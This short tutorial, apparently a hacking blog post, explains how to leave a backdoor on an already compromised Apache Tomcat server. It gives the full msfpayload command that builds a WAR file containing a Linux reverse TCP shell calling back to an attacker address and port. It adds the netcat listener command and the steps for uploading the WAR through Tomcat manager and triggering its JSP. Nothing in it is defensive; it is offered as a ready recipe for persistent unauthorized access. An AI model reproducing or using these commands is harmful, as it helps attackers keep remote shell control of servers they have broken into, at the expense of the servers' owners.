Apache Tomcat WAR backdoor using msfpayload

If you already had compromised Apache Tomcat web server it is useful to leave backdoor for later access.

You can use msfpayload for this:

Screenshot is really smal so this is the command:
#msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 W > reverse_tcp.war


We created WAR, which will connect to LHOST:LPORT and open basic linux shell. So youl need listener from you side. You can use "nc -lvp 4444" for this purpose.

To use backdoor you need to know JSP file name. You can find it extracting files from WAR:

In this tutorial I assume you already has access to Tomcat manager and you know how to upload WAR. So after you uploaded it you can simply call backdoor at any time accessing:

http://:/reverse_tcp/xsltvorkye.jsp

And thats it! :)